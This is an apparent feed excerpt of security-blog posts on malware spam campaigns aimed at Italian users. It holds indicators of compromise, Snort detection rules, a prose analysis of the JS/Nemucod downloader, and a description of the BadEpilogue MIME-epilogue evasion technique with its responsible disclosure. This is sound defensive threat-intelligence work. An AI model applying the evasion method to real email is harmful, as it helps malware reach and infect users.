        title=&quot;&quot;
        src=&quot;/website/static/7e20b114d5255f40c08725fb51e741b9/e4a12/Pesca7.png&quot;
        srcset=&quot;/website/static/7e20b114d5255f40c08725fb51e741b9/804b2/Pesca7.png 384w,
/website/static/7e20b114d5255f40c08725fb51e741b9/e5715/Pesca7.png 768w,
/website/static/7e20b114d5255f40c08725fb51e741b9/e4a12/Pesca7.png 963w&quot;
        sizes=&quot;(max-width: 963px) 100vw, 963px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 654px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/abc19d64c7f9b758ffcef1948f10901d/68e9c/Pesca8.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 26.822916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAA4UlEQVR42jVQy26EMBDj/39rK3WrbfcA4ZkEkkAeQCk5LOWwBK2hqi+ZseyxlYhSWlZVRWnbtn3fG2OEEJidc9baaZq89/M8+xMQSCk7rRUUXRc51z8ey4+fh2Gw1oCUSkJ0eLyHSGscBA+L0VpTyppG1LxGRvR2uSQJud+/brfPj+t7mmVbCNvzGUJY15VznoLKMspY3YjxxPCPqCwLxjkCoSBJgqgQ9m3b9j0svwvK53lBSCqEVEoxdihh608ctY1zquuwfI8j2gkpUE9bCwNenM6LgqQpISSOY8z4iz/zC5RRCxBqsnwAAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Pesca8&quot;
        title=&quot;&quot;
        src=&quot;/website/static/abc19d64c7f9b758ffcef1948f10901d/68e9c/Pesca8.png&quot;
        srcset=&quot;/website/static/abc19d64c7f9b758ffcef1948f10901d/804b2/Pesca8.png 384w,
/website/static/abc19d64c7f9b758ffcef1948f10901d/68e9c/Pesca8.png 654w&quot;
        sizes=&quot;(max-width: 654px) 100vw, 654px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h1&gt;Prevention &amp;#x26; Remediation&lt;/h1&gt;
&lt;p&gt;Le mail di spam e phishing, al momento, sono i maggiori mezzi di diffusione del malware, questo perché sfruttano uno dei fattori più difficili da controllare: l’elemento umano.&lt;/p&gt;
&lt;p&gt;Un buon sistema di filtraggio della posta elettronica è un elemento importante per ridurre le probabilità che gli utenti ricevano email malevole. Tuttavia è bene sensibilizzare periodicamente gli utenti al fenomeno dello spam, ricordando quanto segue:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Non aprire mai né link né allegati ricevuti via mail da sconosciuti o non attesi&lt;/li&gt;
&lt;li&gt;Non abilitare mai le macro su documenti giunti via mail&lt;/li&gt;
&lt;li&gt;In caso di dubbi o sospetti sulla provenienza di una mail contattare l’ufficio IT o un responsabile per ulteriori controlli.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In caso si abbia comunque aperto un allegato simile a quelli sopra citati la prima cosa da fare è contattare il proprio ufficio IT per fare analizzare la macchina con appositi strumenti; è altresì consigliato il cambio di tutte le credenziali utilizzate sull’host potenzialmente infetto. Se il pc è stato utilizzato per accedere a siti di natura finanziaria è bene anche verificare da una postazione sicura eventuali transazioni anomale.&lt;/p&gt;
&lt;p&gt;# Possibili conclusioni&lt;/p&gt;
&lt;p&gt;L’utilizzo di domini cedacriall e l’uso della lingua italiana fanno presupporre che il bersaglio di queste campagne possano essere alcuni istituti bancari italiani.&lt;/p&gt;
&lt;p&gt;D’altronde è possibile che il dominio sia utilizzato esclusivamente come convenzione dagli attaccanti per distinguere i download da parte dei target italiani.&lt;/p&gt;
&lt;p&gt;Resta il fatto che siamo davanti ad un abuso abbastanza evidente del progetto Let’s Encrypt, nato per favorire la sicurezza delle connessioni e del web, che però al momento non è ancora riuscito a stabilire delle politiche di controllo efficaci per stabilire la natura dei richiedenti dei certificati.&lt;/p&gt;
&lt;p&gt;Basta fare una breve ricerca sul web per scoprire che non si tratta di un singolo (e ripetuto) caso di abuso.&lt;/p&gt;
&lt;p&gt;Per quanto il web abbia bisogno di sicurezza non si può trascurare il processo di verifica che ogni Certification Authority dovrebbe essere tenuta a compiere nei confronti di chi vi fa richiesta per un certificato digitale.&lt;/p&gt;
&lt;h1&gt;IOC&lt;/h1&gt;
&lt;h3&gt;Firma IDS&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;alert tcp $EXTERNAL_NET any -&gt; $HOME_NET any (msg:&quot;CERTEGO TROJAN Zeus/Panda 
SSL download (cedacriall.TLD)&quot;; flow:established,from_server; content:&quot;|55 
04 0a|&quot;; content:&quot;|0d|Let|27|s Encrypt&quot;; distance:1; within:14; fast_pattern; 
content:&quot;cedacriall&quot;; nocase; classtype:trojan-activity;)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;MD5&lt;/h3&gt;
&lt;h5&gt;Downloader&lt;/h5&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;a7960e5a86d7aee713f3c0fcee6c96e4
5c66df3788a08c83a97a1074006e09e8
3fa667c19c7e6cfc41dedba1e282bbd3
d9c79044972d8fe0e857a05b016772f1
a05ecf6f1cd0ae183bc8514efb801a65
7c09d53a7929c3bdb3dd418c6e3161f6
4fdeccecfa0fe4532a569e2060be74d5
dbb09aa8e0131b3c246f893705318254
b7995a448008cb5ed570c4ad96f97b56
8b1436cca913772d6ec53deb3e2aecba&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h5&gt;Malware&lt;/h5&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;220e79a5d9dc77b9c84b30245fc7064b
42d84d98b4db642836bd70abcd115750
a73713c62f8726e6825752a1ed356ac9
b611fb923b79921911f7bd4a7969ead4
c191d6dbca9759d63d0ddc1b9352a093
ed554c9d86f0b84db616564f41d746cb
458ffe4f16ae495a83659836a532fbeb&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h5&gt;Domini&lt;/h5&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;cedacriall[.]info
cedacriall[.]win
cedacriall[.]review
cedacriall[.]faith
cedacriall[.]download
3eee22abda47[.]bid&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h5&gt;Indirizzi IP&lt;/h5&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;119.28.82,241
13.59.248,84
34.201.210,159
52.34.34,57
52.91.231,178&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content:encoded></item><item><title><![CDATA[BadEpilogue: The Perfect Evasion]]></title><description><![CDATA[Starting from May 2016, Certego Threat Intelligence platform has been detecting multiple viral spam campaigns using a new evasion technique. These attacks are able to hide malicious attachments inside a specific area of the MIME/Multipart structure and to avoid Content Filtering controls]]></description><link>https://www.certego.net/blog/blog-badepilogue/</link><guid isPermaLink="false">blog-badepilogue</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><pubDate>Tue, 20 Sep 2016 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Starting from May 2016, Certego Threat Intelligence platform has been detecting multiple viral spam campaigns using a &lt;em&gt;&lt;strong&gt;new evasion technique&lt;/strong&gt;&lt;/em&gt;. These attacks are able to hide malicious attachments inside a specific area of the MIME/Multipart structure and to avoid Content Filtering controls.&lt;/p&gt;
&lt;p&gt;Certego has also verified that few of the most common email clients and Web Mail services, using a different way of rendering the MIME/Multipart structure, are able to identify and extract the attachment, resulting in a Malware Evasion technique that we called &lt;em&gt;&lt;strong&gt;BadEpilogue&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Analysis of the evasion technique&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The picture at the top of the page shows a snippet of the source of a malicious email message.&lt;/p&gt;
&lt;p&gt;Rows from 53 to 57 contain the end of the HTML message, while the attachment is located within an area that RFC2046 defines as Epilogue of a MIME/Multipart message, right after the final boundary of the Multipart message located at line 59 ending with the double “-” character.&lt;/p&gt;
&lt;p&gt;According to RFC 2046, the message’s epilogue should not contain any useful text and, in particular, it should be ignored by MIME-compliant software:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;NOTE&lt;/strong&gt;: These &quot;preamble&quot; and &quot;epilogue&quot; areas are generally not used because of the lack of proper typing of these parts and the lack of clear semantics for handling these areas at gateways, particularly X.400 gateways. However, rather than leaving the preamble area blank, many MIME implementations have found this to be a convenient place to insert an explanatory note for recipients who read the message with pre-MIME software, since such notes will be ignored by MIME-compliant software.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the attack, right after the closing boundary of the MIME/Multipart message and at the beginning of the Epilogue area, there is a new boundary (see line 61) that starts another Multipart section containing the malicious attachment.&lt;/p&gt;
&lt;p&gt;Certego verified that many libraries used in Antispam and Antivirus systems to extract and analyze email attachments are unable to detect files hidden in the Epilogue area. On the other hand, popular email clients such as Outlook, Thunderbird and Evolution and also Web Mail services are able to detect the attachment and to show it to the user resulting in a new malware evasion technique.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Responsible Disclosure Policy&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Certego decided to report this evasion technique to the developers of the email clients impacted by BadEpilogue. At the same time, we informed the vendors of major Antispam systems so that some of their Content Filters are ignoring attachments hidden in the Epilogue area.&lt;/p&gt;
&lt;p&gt;So, we reported the technique to Microsoft and Mozilla. Microsoft has just released a patch for their email client in their last Security Bulletin (&lt;a href=&quot;http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3366&quot;&gt;CVE-2016-3366&lt;/a&gt; in the security bulletin &lt;a href=&quot;https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-107?redirectedfrom=MSDN&quot;&gt;MS16-107&lt;/a&gt;) fixing the vulnerability.&lt;/p&gt;
&lt;p&gt;Talking about Antispam systems, Certego contacted Google and TrendMicro: both vendors confirmed the existence of the problem and promptly released a fix for it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Detecting BadEpilogue using a SNORT signature&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Certego also created the following Snort signature, that should detect all incoming SMTP messages exploiting the BadEpilogue evasion technique.&lt;/p&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;alert tcp any any -&gt; $HOME_NET [25,587] (msg:&quot;CERTEGO CURRENT_EVENTS Incoming SMTP Message with Possibly Malicious MIME Epilogue 2016-05-13 (BadEpilogue)&quot;; flow:to_server,established; content:&quot;|0d 0a|Content-Type|3a 20|multipart|2f|mixed|3b|&quot;; pcre:&quot;/\x0d\x0a--(?P&amp;lt;boundary&gt;[\x20\x27-\x29\x2b-\x2f0-9\x3a\x3d\x3fA-Z\x5fa-z]{1,70})--(?:\x0d\x0a(?!--|\x2e|RSET).*)*\x0d\x0a--(?P=boundary)\x0d\x0a/&quot;; reference:url,www.certego.net/en/news/badepilogue-the-perfect-evasion/; classtype:bad-unknown; sid:9000501; rev:3;)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The campaigns&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As mentioned, this evasion technique has been detected in the wild since May 2016, in at least eleven different campaigns exclusively targeting Italian users. These campaigns use messages written in a fluent Italian asking the user to open an attachment labeled as invoice or payment receipt. The attachment is in ZIP format and it contains a malware in PE EXE format. This attack pattern is typical of the so-called Viral Spam that has been prevalent until a few months ago, but it has now been deemed ineffective by antispam filters blocking ZIP files containing PE EXE. In this case, the &lt;em&gt;&lt;strong&gt;BadEpilogue&lt;/strong&gt;&lt;/em&gt; evasion technique allows the attacker to generate extremely effective campaigns that can reach a very high number of targets.&lt;/p&gt;
&lt;p&gt;While the first campaigns were spreading a malicious attachment containing a Trojan Downloader of the &lt;em&gt;&lt;strong&gt;Fareit&lt;/strong&gt;&lt;/em&gt; family which downloaded a variant of the &lt;em&gt;&lt;strong&gt;Andromeda Infostealer&lt;/strong&gt;&lt;/em&gt;, the latest campaigns have started working mainly with ransomware and in the last few days we have observed a massive amount of emails containing &lt;em&gt;&lt;strong&gt;Zlader&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The following picture shows the various campaigns using the &lt;em&gt;&lt;strong&gt;BadEpilogue&lt;/strong&gt;&lt;/em&gt; evasion technique as reported by our systems.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1218px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/e9e05ab23c5362342c190a6666273871/c929c/BadEpilogue2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 17.1875%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAfUlEQVR42lVOORLCMBDz/39IwVBQAMM4juNzT6MUFFG1OmalIKJTyJevP9xdRFhOMONgYlKzdYWYhNHnq37ZhJSnEtTM1fyMNh14Gmd+9whKxqDmjhiqbukRwD5tK9QL9zQO1MaeRcXUCrVcS+x7GgUKXGwcPLdxYMh9f/4AAxevGW0+aKoAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;BadEpilogue2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/e9e05ab23c5362342c190a6666273871/c929c/BadEpilogue2.png&quot;
        srcset=&quot;/website/static/e9e05ab23c5362342c190a6666273871/804b2/BadEpilogue2.png 384w,
/website/static/e9e05ab23c5362342c190a6666273871/e5715/BadEpilogue2.png 768w,
/website/static/e9e05ab23c5362342c190a6666273871/c929c/BadEpilogue2.png 1218w&quot;
        sizes=&quot;(max-width: 1218px) 100vw, 1218px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The following picture shows the geolocation of IP addresses used to spread the malicious emails. Spreading patterns seem to be related to a single botnet that is expanding and contracting over time. This seems to be confirmed also by the fact that so far only Italian users have been targeted by these attacks.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1154px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/2b6959430058c5ceb537de9eb0222cf9/0940f/BadEpilogue3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 63.541666666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAABYlAAAWJQFJUiTwAAACAklEQVR42nWSW4+bMBCF+f//qFKrqg8rrSKl2SaAwdjGNuZmSAJJnCUXkh7Iqm+1Rslg+ztjn7G3CuNvv96+//gZxCzNiqJulSnbXZcVNVcGIfQr8jnPX5+veY8JGSYC4VOu8vLkzu5zeD6fpW0DyhOZYYmwNExSKlRAsRO5mBPhxVwGiYi4hJgpranscLkCRo5lJg1IYCRJi6phs9aLn2CUExkOk1fNtm62Kq+KugGMGVSOhYIuctvux/FxPDnb7qBLhYaQBwilMIbLZd/1EEFxqACLU91stwBu9/s4js/H4/GcBv52XV/arQcBmurKtpjsT25/PIH3qSAJU4I2trpeL+N4x7heLsCP7iyzAsdBcY+mClbh5sMALq3CDZ0ulkZM5JlUiteN7fuDcw68O7RayZAyGAEXJhhZkHBTZFbyiBB/djLV5nMYdl23ncau73vnjlWpAxIRJkLAbIL1qxmEyUgoXZTK5LPPmW3as3O7fQe3ucogSDn6mr46N8HYhAtM9giFKQCP8V5UtR9zLHddV5T1fDQx227yys47JYp5eFgrn6wJ/Qji5SYUOjscDrjLrC1r26D/wCaeiso2t9tNmWITxVOfl+vgbbHE72K1fl9+sFQLZTYRQ6kpKIedX/n8SbiMEv5n8f7bJ15WWmnKf4HnPT/g/wbXOZXGJzwU+i/357MJ2qv/DQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;BadEpilogue3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/2b6959430058c5ceb537de9eb0222cf9/0940f/BadEpilogue3.png&quot;
        srcset=&quot;/website/static/2b6959430058c5ceb537de9eb0222cf9/804b2/BadEpilogue3.png 384w,
/website/static/2b6959430058c5ceb537de9eb0222cf9/e5715/BadEpilogue3.png 768w,
/website/static/2b6959430058c5ceb537de9eb0222cf9/0940f/BadEpilogue3.png 1154w&quot;
        sizes=&quot;(max-width: 1154px) 100vw, 1154px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Italian spam campaigns using JS/Nemucod downloader]]></title><description><![CDATA[Our studies about 3 different malware that are using a JavaScript downloader called JS/Nemucod]]></description><link>https://www.certego.net/blog/blog-jsnemucode/</link><guid isPermaLink="false">blog-jsnemucode</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Malware]]></category><dc:creator><![CDATA[Pietro Delsante]]></dc:creator><pubDate>Wed, 14 Oct 2015 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Abstract&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In the last few days, since October 7, 2015, Certego&apos;s spamtrap started analyzing three different malware campaigns targeted to Italian users. All three campaigns are using a JavaScript downloader called JS/Nemucod, which is attached directly to the emails inside a ZIP file. When the user opens the zip file and double clicks the JavaScript, the default file type associations in Windows will cause Internet Explorer to open and execute the JavaScript.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Campaign&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We were able to identify three different campaigns, all of them being targeted specifically at Italian users: in all cases, emails were written in Italian, and so was the PDF document used as a decoy.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Campaign 0710TIT&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This campaign started hitting our mailboxes on October 7. Some examples of attachment names are:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1408px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/24e6af2674bd46fe38dd0f2252f8c5e1/67a79/JSNemucod1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 6.25%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAIAAABR8BlyAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAMUlEQVR42mN49erV8+fPnzx58vjxYyDj6dOnjx49evbs2fv37799+/YVBwBKffz4EQCQKzfhy8cFoAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/24e6af2674bd46fe38dd0f2252f8c5e1/67a79/JSNemucod1.png&quot;
        srcset=&quot;/website/static/24e6af2674bd46fe38dd0f2252f8c5e1/804b2/JSNemucod1.png 384w,
/website/static/24e6af2674bd46fe38dd0f2252f8c5e1/e5715/JSNemucod1.png 768w,
/website/static/24e6af2674bd46fe38dd0f2252f8c5e1/67a79/JSNemucod1.png 1408w&quot;
        sizes=&quot;(max-width: 1408px) 100vw, 1408px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Some examples of the JavaScript files inside the zip are:
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1404px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/11925c59bea520435222d038ecd46880/f793b/JSNemucod2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 9.895833333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAQUlEQVR42n3LOQ7AMAgAQf//j0jmsETFIWTqUKZJtppm1zkHEYkIAPbeY1UdiIiZdff9br1nZp4hM909Iqrq/vYAOTBvW5wSmqgAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucod2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/11925c59bea520435222d038ecd46880/f793b/JSNemucod2.png&quot;
        srcset=&quot;/website/static/11925c59bea520435222d038ecd46880/804b2/JSNemucod2.png 384w,
/website/static/11925c59bea520435222d038ecd46880/e5715/JSNemucod2.png 768w,
/website/static/11925c59bea520435222d038ecd46880/f793b/JSNemucod2.png 1404w&quot;
        sizes=&quot;(max-width: 1404px) 100vw, 1404px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The variant of JS/Nemucod used in this campaign is employing two different layers of obfuscation, both of them using a simple bitwise XOR with a 12 to 14-byte long key. In the first layer, all the JavaScript code is obfuscated; the second layer only obfuscates the domain names of the Command &amp;#x26; Control servers.&lt;/p&gt;
&lt;p&gt;Once executed, Nemucod will instantiate three different ActiveX controls: WScript.Shell, MSXML2.XMLHTTP and ADODB.Stream. To make a long story short, Nemucod will use them to save an executable file to the temporary folder %TEMP% and to run it; right after that, Nemucod will open a legitimate PDF file in the browser: this document is uses as a decoy to let the user believe they&apos;re actually viewing a real invoice, as shown below.
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1410px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/631b193c8c2ad9aa697ab1f750af1c0f/45662/JSNemucodN.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 75.26041666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAIAAABr+ngCAAAACXBIWXMAABYlAAAWJQFJUiTwAAACl0lEQVR42l1SS2/aQBD2L63aewP00kvaNJV66Ck9RjnkXDU9tVXVKgqBQLHxrl/rB7aB2CaAeZn4ASa8Ah2bNIr6aTye2d2Z3flmqErhMn9xUSxcgpTLJYamQf8plxm6wjB0laERW8UI8TwWBYEQSZWJqioyETkOUahSwCwtSCLCSNdV09Qtq6lpNTFFo15XFJXjOFVVazWdFyQWixKRGZYXREK9O3hD0xXH6jRNyzBsXbccpzMaDXu9Xr/fHwwGw+HQ9/3b21vLujYht26ANgyzXCpS2WxWEUnuw9Xz1z8PD38/e/F5/+2v7Xa72Wx30Go1nhfcJFdvMOiHYRgEfhSFkoCpTGaPEHJ8ij4eXRx9yu8f/Dg+KUPM/f0GAKrb7TabzXa77aa4S7FcrWSJp7KZDCFysWCenaFv36UvX7lC0dj+A8RHcEsYRNFk567X69VqBbaqSMmzOYybzQaUdDeL1+vl5vHFKWp6jUVsp9uFLIvFYpcCtEKE5Gbogev2gAOoy/O83YnHm+M4ns1moIMgBGO1WsLlsGXo2kPN4MD2crncndvh0QbmoVU4BbSNyPJkMnHsayqXyzIMAy0tlUrXlqXruuM40CGEUKvVajQaQFK9Xm/d3BiGIcuyBCBkNBrZSXA2gxG2HVvTNNtx3J5rWzZkAXohRQdq7brwtTudhPCuCw4YnjdOgl/lcvAYYBTEsiyzXk9nIJkEP/DjeAqNgWePPQ8GBTJAxj644zR4b+8lhzmoGWh4StVuBboCnE2nU7CXKebzOSyDtm2Len94gDFazOMwGAejwTQKJ5MHgUny/XEUBaPhIAwTO0jG1AvhN/YUWaQ4On9VOD+/KqhKkTk9EUp5TeFVEanSU8H/uTJfrbLoL1zsAjSPSLgiAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucodN&quot;
        title=&quot;&quot;
        src=&quot;/website/static/631b193c8c2ad9aa697ab1f750af1c0f/45662/JSNemucodN.png&quot;
        srcset=&quot;/website/static/631b193c8c2ad9aa697ab1f750af1c0f/804b2/JSNemucodN.png 384w,
/website/static/631b193c8c2ad9aa697ab1f750af1c0f/e5715/JSNemucodN.png 768w,
/website/static/631b193c8c2ad9aa697ab1f750af1c0f/45662/JSNemucodN.png 1410w&quot;
        sizes=&quot;(max-width: 1410px) 100vw, 1410px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This version of the JavaScript file downloads a simple EXE file which is then invoked directly in the background through the WScript.Shell ActiveX control. Right after that, the malware opens the decoy PDF document through the ADODB.Stream ActiveX control.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Campaign 0810DTIT&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This campaign started hitting our sandbox on October 8. Attachment names are very similar to the first campaign:
&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1402px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/1596cd1ed7e981fc72f84f492d155d35/cf8e5/JSNemucodM.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 6.770833333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAIAAABR8BlyAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAJ0lEQVR42mN49erVixcvnoDB8+fPnz179vTpUyD57t27r1+/fsELAJDNN9igvlj/AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;JSNemucodM&quot;
